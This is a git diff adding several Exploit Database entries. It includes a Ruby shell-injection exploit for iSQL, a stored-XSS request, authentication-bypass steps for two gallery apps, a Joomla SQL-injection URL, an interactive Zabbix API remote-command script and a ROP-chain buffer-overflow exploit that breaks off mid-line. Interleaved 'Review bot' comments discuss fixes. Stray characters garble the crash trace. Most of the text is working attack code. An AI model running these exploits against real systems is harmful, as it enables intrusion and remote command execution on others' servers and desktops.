+Attached are three proof of concept PDF files. 
+ +There is another crash likely related to this issue: + +--- cut --- +Program received signal SIGSEGV, Segmentation fault. +0x0000000000ab0f94 in _CMapLookupCallback(void*, void*) () +(gdb) where +#0 0x0000000000ab0f94 in _CMapLookupCallback(void*, void*) () +#1 0x0000000000aab8e4 in CFX_BaseSegmentedArray::IterateSegment(unsigned char const*, int, int (*)(void*, void*), void*) const () +#2 0x0000000000aab9dc in CFX_BaseSegmentedArray::Iterate(int (*)(void*, void*), void*) const () +#3 0x0000000000ab1a99 in CFX_CMapByteStringToPtr::Lookup(CFX_ByteStringC const&, void*&) const () +#4 0x00000000007db5df in CPDF_Dictionary::KeyExist(CFX_ByteStringC const&) const () +#5 0x000000000070e6a6 in CBMTreeCtrl::GotoBookmark(CPDF_Bookmark, CPDF_Bookmark) () +#6 0x000000000070e6e3 in CBMTreeCtrl::GotoBookmark(CPDF_Bookmark, CPDF_Bookmark) () +#7 0x000000000070f986 in CBMTreeCtrl::on_ItemExpanded(QTreeWidgetItem*) () +#8 0x00007ffff63682a6 in QMetaObject::activate(QObject*, int, int, void**) () + from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5 +#9 0x00007ffff7722612 in QTreeWidget::itemExpanded(QTreeWidgetItem*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#10 0x00007ffff63682a6 in QMetaObject::activate(QObject*, int, int, void**) () + from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5 +#11 0x00007ffff76ecc92 in QTreeView::expanded(QModelIndex const&) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#12 0x00007ffff76f8903 in QTreeView::expand(QModelIndex const&) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#13 0x00007ffff7724e44 in QTreeWidget::expandItem(QTreeWidgetItem const*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#14 0x000000000070a0cb in CBMTreeView::ReBuildTree_Proc(CFX_BookMarkPanelToolHandler*, CPDF_Document*, CPDF_Bookmark, QTreeWidgetItem*, int, int) () +#15 0x000000000070a4c7 in CBMTreeView::ReBuildTree_Proc(CFX_BookMarkPanelToolHandler*, CPDF_Document*, CPDF_Bookmark, QTreeWidgetItem*, int, int) () +#16 0x000000000070beb6 in 
CBMTreeView::ReBuildTree(int) () +#17 0x000000000051eaff in CChildFrame::GetPanelMgrEx (this=0x196cf90) + at ../../Readerlite/ReaderLite/src/childframe.cpp:91 +x#18 0x00000000005000c1 in CReader_DocViewEx::InitViewData (this=0x191dce0) + at ../../Readerlite/ReaderLite/src/frd_docviewex.cpp:61 +#19 0x000000000048e691 in CPDF_OwnerFileTypeHandler::OpenContinueNormal (this=0x1468c50, pdoc=0x19194b0, + filePath=...) at ../../Readerlite/ReaderLite/src/pdfeventhandler.cpp:99 +/#20 0x000000000048f754 in CPDF_OwnerFileTypeHandler::DoOpen (this=0x1468c50, csFilterName=..., + wsPathName=...) at ../../Readerlite/ReaderLite/src/pdfeventhandler.cpp:216 +#21 0x000000000045d038 in CReader_AppEx::OwnerFileTypeHandlerDoOpen (this=0x144a920, csFDFFile=...) + at ../../Readerlite/ReaderLite/src/frd_appex.cpp:941 +1#22 0x000000000043caac in CMainWindow::OpenFile (this=0x1468760, fileName=...) + at ../../Readerlite/ReaderLite/src/mainwindow.cpp:434 +#23 0x0000000000439da9 in main (argc=2, argv=0x7fffffffe288) at ../../Readerlite/ReaderLite/src/main.cpp:301 +(gdb) x/10i $rip +=> 0xab0f94 <_Z19_CMapLookupCallbackPvS_+2>: cmp %edi,(%rsi) + 0xab0f96 <_Z19_CMapLookupCallbackPvS_+4>: jne 0xab0fa1 <_Z19_CMapLookupCallbackPvS_+15> + 0xab0f98 <_Z19_CMapLookupCallbackPvS_+6>: xor %eax,%eax + 0xab0f9a <_Z19_CMapLookupCallbackPvS_+8>: cmpb $0xfe,0x4(%rsi) + 0xab0f9e <_Z19_CMapLookupCallbackPvS_+12>: setne %al + 0xab0fa1 <_Z19_CMapLookupCallbackPvS_+15>: xor $0x1,%eax + 0xab0fa4 <_Z19_CMapLookupCallbackPvS_+18>: retq + 0xab0fa5 <_CompareDWord>: mov (%rdi),%eax + 0xab0fa7 <_CompareDWord+2>: sub (%rsi),%eax + 0xab0fa9 <_CompareDWord+4>: retq +(gdb) info reg $rsi +rsi 0x71 113 +--- cut --- + +Attached are three further files which reproduce the crash (note that MALLOC_CHECK_=3 might be necessary). + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39944.zip + 
diff --git a/platforms/linux/local/39938.rb b/platforms/linux/local/39938.rb
new file mode 100755
index 000000000..9a78b6d39
--- /dev/null
+++ b/platforms/linux/local/39938.rb
@@ -0,0 +1,90 @@ +#!/bin/ruby +# Exploit Title: iSQL(RL) 1.0 - Shell Command Injection +# Date: 2016-06-13 +# Exploit Author: HaHwul +# Exploit Author Blog: www.hahwul.com +# Vendor Homepage: https://github.com/roselone/iSQL +# Software Link: https://github.com/roselone/iSQL/archive/master.zip +# Version: 1.0 +# Tested on: Debian [wheezy] +# CVE : none + + +=begin +### Vulnerability Point + :: [isql_main.c 455 line] popen(cmd,"r"); code is vulnerable + :: don't filtering special characters in str value +446 char *get_MD5(char *str){ +447 FILE *stream; +448 char *buf=malloc(sizeof(char)*33); +449 char cmd[100]; +450 memset(buf,'\0',sizeof(buf)); +451 memset(cmd,'\0',sizeof(cmd)); +452 strcpy(cmd,"echo "); //5 +453 strcpy((char *)cmd+5,str); +454 strcpy((char *)cmd+5+strlen(str)," | md5sum"); +455 stream=popen(cmd,"r"); +456 fread(buf,sizeof(char),32,stream); +457 // printf("%s\n",buf); +458 return buf; +459 } + +### Vulnerability Triger +614 while (USER_NUM==-1){ +615 printf(">username:"); +616 scanf("%s",username); +617 printf(">password:"); +618 scanf("%s",passwd); +619 md5=get_MD5(passwd); + +### Vulnerability Run +>username:asdf; +>password:asdf;top;echo 1 + + (~) #> ps -aux | grep top +root 13279 0.0 0.0 4472 860 pts/1 S+ 13:33 0:00 sh -c echo asdf;top;echo | md5sum +root 13280 0.3 0.0 26304 3200 pts/1 S+ 13:33 0:00 top + +=end + +### Attack command +#> (sleep 5; echo -en 'aasdf\n';sleep 1;echo -en 'asdf;nc;echo 1';sleep 10) | ./isql + +### Ruby Code +puts "SQL 1.0 - Shell Command Injection" +puts "by hahwul" +if(ARGV.size != 1) + puts "Usage: ruby iSQL_command_injection.rb [COMMAND]" + puts " need ./isql in same directory" + exit() +else + puts "CMD :: "+ARGV[0] + puts "Run Injection.." + system("(sleep 5; echo -en 'aasdf\n';sleep 1;echo -en 'asdf;#{ARGV[0]};echo 1';sleep 10) | ./isql") +end + +### Sample Output +=begin +#> ruby test.rb nc +# Exploit Title: iSQL 1.0 Shell Command Injection +by hahwul +CMD :: nc +Run Injection.. 
+ +*************** welcome to ISQL **************** +* version 1.0 * +* Designed by RL * +* Copyright (c) 2011, RL. All rights reserved * +************************************************ + +>username:>password:verify failure , try again ! +This is nc from the netcat-openbsd package. An alternative nc is available +in the netcat-traditional package. +usage: nc [-46bCDdhjklnrStUuvZz] [-I length] [-i interval] [-O length] + [-P proxy_username] [-p source_port] [-q seconds] [-s source] + [-T toskeyword] [-V rtable] [-w timeout] [-X proxy_protocol] + [-x proxy_address[:port]] [destination] [port] +>username:>password:verify failure , try again ! +^Ctest.rb:10:in `system': Interrupt + from test.rb:10:in `
' +=end diff --git a/platforms/php/webapps/39931.txt b/platforms/php/webapps/39931.txt new file mode 100755 index 000000000..9ee075af8 --- /dev/null +++ b/platforms/php/webapps/39931.txt @@ -0,0 +1,49 @@ +# Exploit Title: FRticket - Ticket System - Stored XSS +# Google Dork: [if applicable] +# Date: 11.06.2016 +# Exploit Author: Hamit ABİŞ +# Vendor Homepage: http://codecanyon.net/item/frticket-ticket-system/16539836 +# Version: v1 + +######################################################################################################### + +About + + +Get the world’s most popular customer support ticket system. FRticket is basically a management of enquiries between customers , agents and admins + + +Features: + + +- Admin Panel Dashboard + +- Email Templates + +- Agent Assignment + +- Status Management + +- Priority Management + +- Categories Management + +- And More Coming Soon… + + +######################################################################################################### + + +########################################################################################################## +Proof of Concept - Stored Ticket Title + +POST /ticket/public/ticket HTTP/1.1 +Host: server +User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.04 +Connection: keep-alive +_token=3XSACg1vDJQgzFCkVGk7nqE0HMOPlsuo7sbj5Z2y&subject=&priority=2&category=2&description=somecomments + +########################################################################################################## + + +Twitter: https://twitter.com/sar1nz \ No newline at end of file diff --git a/platforms/php/webapps/39932.html b/platforms/php/webapps/39932.html new file mode 100755 index 000000000..611aacbec --- /dev/null +++ b/platforms/php/webapps/39932.html @@ -0,0 +1,57 @@ + + + + + + + + + diff --git a/platforms/php/webapps/39934.txt b/platforms/php/webapps/39934.txt new file mode 100755 index 000000000..10dee127c --- /dev/null +++ b/platforms/php/webapps/39934.txt 
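Review bot: The get_MD5 excerpt quoted in the `=begin` block has more wrong with it than the unfiltered popen() the advisory points at: `memset(buf,'\0',sizeof(buf))` clears only sizeof(char *) bytes of the 33-byte allocation, so the 32 bytes that `fread` stores are never NUL-terminated, and `stream` is never pclose'd. The durable remediation for the injection is to compute the digest in-process with a hashing library instead of assembling a shell pipeline from `str`; if a child process is unavoidable, spawn it with fork/exec and an argv array so no shell ever parses the input. The unbounded `strcpy` of `str` into `cmd[100]` is a separate stack-overflow defect that the same rewrite would remove. Minor: the runtime banner `puts "SQL 1.0 - Shell Command Injection"` drops the leading "i" that the `# Exploit Title` header uses.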
@@ -0,0 +1,42 @@ + + + +======================================================================================================= + +Dream Gallery 2.0 Admin panel Authentication bypass + +Description : An Attackers are able to completely compromise the web application built upon +Dream Gallery as they can gain access to the admin panel and +manage the website as an admin without prior authentication! + + +Step 1: Create a rule in No-Redirect Add-on: ^http://example.com/path/admin/login.php +Step 2: Access http://example.com/path/admin/index.php + + +Risk : Unauthenticated attackers are able to gain full access to the administrator panel +and thus have total control over the web application, including content change,add admin user .. etc + +======================================================================================================= +potential fix + + + + + +[+] Exploit by: Ali BawazeEer +[+] Twitter:@AlibawazeEer +[+] Linkedin : https://www.linkedin.com/in/AliBawazeEer \ No newline at end of file diff --git a/platforms/php/webapps/39935.txt b/platforms/php/webapps/39935.txt new file mode 100755 index 000000000..2613ea2b1 --- /dev/null +++ b/platforms/php/webapps/39935.txt 
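Review bot: The `potential fix` heading at the end of the advisory has no body in this hunk (the text appears to have been stripped, possibly because it was markup), so the report documents the bypass but not the remediation. The described steps, an admin page that merely redirects unauthenticated visitors to login.php, most likely point at the classic pattern of emitting a Location header without terminating the script; the fix is to stop execution immediately after the redirect and, better, to verify the session at the top of every admin page before any content is produced. The Grid Gallery advisory (39935.txt) that follows has the identical empty `potential fix` section.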
@@ -0,0 +1,42 @@ + + + +======================================================================================================= + +Grid Gallery 1.0 Admin panel Authentication bypass + +Description : An Attackers are able to completely compromise the web application built upon +Grid Gallery as they can gain access to the admin panel and +manage the website as an admin without prior authentication! + + +Step 1: Create a rule in No-Redirect Add-on: ^http://example.com/path/admin/login.php +Step 2: Access http://example.com/path/admin/index.php + + +Risk : Unauthenticated attackers are able to gain full access to the administrator panel +and thus have total control over the web application, including content change,add admin user .. etc + +======================================================================================================= +potential fix + + + + + +[+] Exploit by: Ali BawazeEer +[+] Twitter:@AlibawazeEer +[+] Linkedin : https://www.linkedin.com/in/AliBawazeEer \ No newline at end of file diff --git a/platforms/php/webapps/39936.txt b/platforms/php/webapps/39936.txt new file mode 100755 index 000000000..ed29e0272 --- /dev/null +++ b/platforms/php/webapps/39936.txt @@ -0,0 +1,25 @@ +###################### +# Exploit Title : Joomla com_payplans - SQL Injection +# Exploit Author : Persian Hack Team +# Vendor Homepage : http://extensions.joomla.org/extension/payplans +# Category: [ Webapps ] +# Tested on: [ Win ] +# Version: 3.3.6 +# Date: 2016/06/08 +###################### +# +# PoC: + +# group_id Parameter Vulnerable To SQL + +# Demo : + +# http://server/index.php?option=com_payplans&group_id=4%27 + +# Youtube : https://www.youtube.com/watch?v=Y5mpM0IBlUk + +###################### +# Discovered by : Mojtaba MobhaM +# Greetz : Muhmmad Emad & T3NZOG4N & FireKernel & Milad Hacking & JOK3R And All Persian Hack Team Members +# Homepage : persian-team.ir +###################### \ No newline at end of file 
diff --git a/platforms/php/webapps/39937.py b/platforms/php/webapps/39937.py new file mode 100755 index 000000000..26ef8ab34 --- /dev/null +++ b/platforms/php/webapps/39937.py @@ -0,0 +1,75 @@ +#!/usr/bin/env python +# -*- coding: utf-8 -*- + +# Exploit Title: Zabbix RCE with API JSON-RPC +# Date: 06-06-2016 +# Exploit Author: Alexander Gurin +# Vendor Homepage: http://www.zabbix.com +# Software Link: http://www.zabbix.com/download.php +# Version: 2.2 - 3.0.3 +# Tested on: Linux (Debian, CentOS) +# CVE : N/A + +import requests +import json +import readline + +ZABIX_ROOT = 'http://192.168.66.2' ### Zabbix IP-address +url = ZABIX_ROOT + '/api_jsonrpc.php' ### Don't edit + +login = 'Admin' ### Zabbix login +password = 'zabbix' ### Zabbix password +hostid = '10084' ### Zabbix hostid + +### auth +payload = { + "jsonrpc" : "2.0", + "method" : "user.login", + "params": { + 'user': ""+login+"", + 'password': ""+password+"", + }, + "auth" : None, + "id" : 0, +} +headers = { + 'content-type': 'application/json', +} + +auth = requests.post(url, data=json.dumps(payload), headers=(headers)) +auth = auth.json() + +while True: + cmd = raw_input('\033[41m[zabbix_cmd]>>: \033[0m ') + if cmd == "" : print "Result of last command:" + if cmd == "quit" : break + +### update + payload = { + "jsonrpc": "2.0", + "method": "script.update", + "params": { + "scriptid": "1", + "command": ""+cmd+"" + }, + "auth" : auth['result'], + "id" : 0, + } + + cmd_upd = requests.post(url, data=json.dumps(payload), headers=(headers)) + +### execute + payload = { + "jsonrpc": "2.0", + "method": "script.execute", + "params": { + "scriptid": "1", + "hostid": ""+hostid+"" + }, + "auth" : auth['result'], + "id" : 0, + } + + cmd_exe = requests.post(url, data=json.dumps(payload), headers=(headers)) + cmd_exe = cmd_exe.json() + print cmd_exe["result"]["value"] \ No newline at end of file 
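Review bot: The header presents this as an RCE with no preconditions, but the code shows it is entirely authenticated: it logs in with the hard-coded `login = 'Admin'` / `password = 'zabbix'` and then needs an account allowed to call `script.update` and `script.execute`, so that prerequisite belongs in the header comment. The loop also permanently overwrites the global script with `"scriptid": "1"` on the target every iteration, a side effect a tester should know about before running it. From the defender's side those two API methods are exactly what the Zabbix audit log would record, and changing the default credentials plus restricting script-execution rights removes the path this script relies on. Style: `print cmd_exe["result"]["value"]` and `raw_input` tie the file to Python 2, which the `#!/usr/bin/env python` shebang does not make explicit.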
diff --git a/platforms/windows/local/39933.py b/platforms/windows/local/39933.py
new file mode 100755
index 000000000..8453994d2
--- /dev/null
+++ b/platforms/windows/local/39933.py
@@ -0,0 +1,192 @@ +# Exploit Title: Easy RM to MP3 Converter 2.7.3.700 (.m3u) File BoF Exploit with Universal DEP+ASLR bypass +# Date: 2016-06-12 +# Exploit Author: Csaba Fitzl +# Vendor Homepage: N/A +# Software Link: https://www.exploit-db.com/apps/707414955696c57b71c7f160c720bed5-EasyRMtoMP3Converter.exe +# Version: 2.7.3.700 +# Tested on: Windows 7 x64 +# CVE : CVE-2009-1330 + +import struct + +def create_rop_chain(): + + # rop chain generated with mona.py - www.corelan.be + # added missing parts, and some optimisation by Csaba Fitzl + rop_gadgets = [ + + #mov 1000 to EDX - Csaba + 0x41414141, # Filler (compensate) + 0x41414141, # Filler (compensate) + 0x41414141, # Filler (compensate) + 0x10025a1c, # XOR EDX,EDX # RETN + 0x1002bc3d, # MOV EAX,411 # RETN + 0x1002dc4c, # ADD EAX,100 # POP EBP # RETN + 0x41414141, # Filler (compensate) + 0x1002dc4c, # ADD EAX,100 # POP EBP # RETN + 0x41414141, # Filler (compensate) + 0x1002dc4c, # ADD EAX,100 # POP EBP # RETN + 0x41414141, # Filler (compensate) + 0x1002dc4c, # ADD EAX,100 # POP EBP # RETN + 0x41414141, # Filler (compensate) + 0x1002dc4c, # ADD EAX,100 # POP EBP # RETN + 0x41414141, # Filler (compensate) + 0x1002dc4c, # ADD EAX,100 # POP EBP # RETN + 0x41414141, # Filler (compensate) + 0x1002dc4c, # ADD EAX,100 # POP EBP # RETN + 0x41414141, # Filler (compensate) + 0x1002dc4c, # ADD EAX,100 # POP EBP # RETN + 0x41414141, # Filler (compensate) + 0x1002dc4c, # ADD EAX,100 # POP EBP # RETN + 0x41414141, # Filler (compensate) + 0x1002dc4c, # ADD EAX,100 # POP EBP # RETN + 0x41414141, # Filler (compensate) + 0x1002dc4c, # ADD EAX,100 # POP EBP # RETN + 0x41414141, # Filler (compensate) + 0x1002dc24, # ADD EAX,80 # POP EBP # RETN + 0x41414141, # Filler (compensate) + 0x1002dc41, # ADD EAX,40 # POP EBP # RETN + 0x41414141, # Filler (compensate) + 0x1001d2ac, # ADD EAX,4 # RETN + 0x1001d2ac, # ADD EAX,4 # RETN + 0x1001d2ac, # ADD EAX,4 # RETN + 0x1001d2ac, # ADD EAX,4 # RETN + 0x1001d2ac, # ADD EAX,4 # RETN + 0x1001d2ac, 
# ADD EAX,4 # RETN + 0x1001d2ac, # ADD EAX,4 # RETN + 0x1001d2ac, # ADD EAX,4 # RETN + 0x1001d2ac, # ADD EAX,4 # RETN + 0x1001d2ac, # ADD EAX,4 # RETN + 0x1001d2ac, # ADD EAX,4 # RETN + 0x10023327, # INC EAX # RETN + 0x10023327, # INC EAX # RETN + 0x10023327, # INC EAX # RETN + # AT this point EAX = 0x1000 + 0x1001a788, # PUSH EAX # POP ESI # POP EBP # MOV EAX,1 # POP EBX # POP ECX # RETN [MSRMfilter03.dll] + 0x41414141, # Filler (compensate) + 0x41414141, # Filler (compensate) + 0x41414141, # Filler (compensate) + 0x1001bf0d, #(RVA : 0x0001bf0d) : # ADC EDX,ESI + 0x41414141, # Filler (compensate) + + + 0x10026d56, # POP EAX # RETN [MSRMfilter03.dll] + 0x10032078, # ptr to &VirtualAlloc() [IAT MSRMfilter03.dll] + 0x1002e0c8, # MOV EAX,DWORD PTR DS:[EAX] # RETN [MSRMfilter03.dll] + + 0x1001a788, # PUSH EAX # POP ESI # POP EBP # MOV EAX,1 # POP EBX # POP ECX # RETN [MSRMfilter03.dll] + 0x41414141, # Filler (compensate) + 0x41414141, # Filler (compensate) + 0x41414141, # Filler (compensate) + 0x10027c5a, # POP EBP # RETN [MSRMfilter03.dll] + 0x1001b058, # & push esp # ret [MSRMfilter03.dll] + 0x1002b93e, # POP EAX # RETN [MSRMfilter03.dll] + 0xfffffffb, # put delta into eax (-> put 0x00000001 into ebx) + 0x1001d2ac, # ADD EAX,4 # RETN + 0x10023327, # INC EAX # RETN + 0x10023327, # INC EAX # RETN + 0x1001bdee, # PUSH EAX # MOV EAX,1 # POP EBX # ADD ESP,8 # RETN [MSRMfilter03.dll] + 0x41414141, # Filler (compensate) + 0x41414141, # Filler (compensate) + + 0x10029f74, # POP ECX # RETN [MSRMfilter03.dll] + 0xffffffff, # + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # 
AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # 
RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002bc6a, # POP EDI # RETN [MSRMfilter03.dll] + 0x1001c121, # RETN (ROP NOP) [MSRMfilter03.dll] + 0x10026f2b, # POP EAX # RETN [MSRMfilter03.dll] + 0x10024004, #address to xor, it will point to the DLL's data section which is writeable. Also will work as NOP + 0x1002bc07 # PUSHAD # XOR EAX,11005 # ADD BYTE PTR DS:[EAX],AL + + ] + return ''.join(struct.pack('